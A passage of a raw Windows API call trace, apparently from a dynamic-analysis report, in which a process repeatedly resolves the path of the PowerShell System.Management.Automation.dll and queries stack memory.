lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.421] GetLastError () returned 0x0 [0050.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.421] GetLastError () returned 0x0 [0050.421] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x9d4e1f, Data2=0x19b2, Data3=0x436a, Data4=([0]=0x87, [1]=0xb0, [2]=0x2a, [3]=0xf9, [4]=0x75, [5]=0x8, [6]=0x27, [7]=0x3))) returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.422] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.423] GetLastError () returned 0x0 [0050.424] VirtualQuery (in: lpAddress=0x19ce44, lpBuffer=0x19de44, dwLength=0x1c | out: lpBuffer=0x19de44*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.425] VirtualQuery (in: lpAddress=0x19ce80, lpBuffer=0x19de80, dwLength=0x1c | out: lpBuffer=0x19de80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.425] GetLastError () returned 0x0 [0050.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.425] GetLastError () returned 0x0 [0050.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.425] GetLastError () returned 0x0 [0050.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.425] GetLastError () returned 0x0 [0050.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.425] GetLastError () returned 0x0 [0050.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.425] GetLastError () returned 0x0 [0050.426] VirtualQuery (in: lpAddress=0x19d1b0, lpBuffer=0x19e1b0, dwLength=0x1c | out: lpBuffer=0x19e1b0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.426] GetLastError () returned 0x0 [0050.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.426] GetLastError () returned 0x0 [0050.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.426] GetLastError () returned 0x0 [0050.426] VirtualQuery (in: lpAddress=0x19d1b0, lpBuffer=0x19e1b0, dwLength=0x1c | out: lpBuffer=0x19e1b0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.426] GetLastError () returned 0x0 [0050.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.426] GetLastError () returned 0x0 [0050.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.426] GetLastError () returned 0x0 [0050.427] VirtualQuery (in: lpAddress=0x19d1b0, lpBuffer=0x19e1b0, dwLength=0x1c | out: lpBuffer=0x19e1b0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.427] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.427] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.428] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.428] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.429] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.429] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.429] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.429] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.429] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.429] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.431] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.431] VirtualQuery (in: lpAddress=0x19cfec, lpBuffer=0x19dfec, dwLength=0x1c | out: lpBuffer=0x19dfec*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.431] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.479] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.479] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.479] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.479] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb19b13ae, Data2=0xa489, Data3=0x4f21, Data4=([0]=0x8e, [1]=0x27, [2]=0x8a, [3]=0x18, [4]=0x36, [5]=0xaf, [6]=0xbb, [7]=0x7e))) returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.480] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 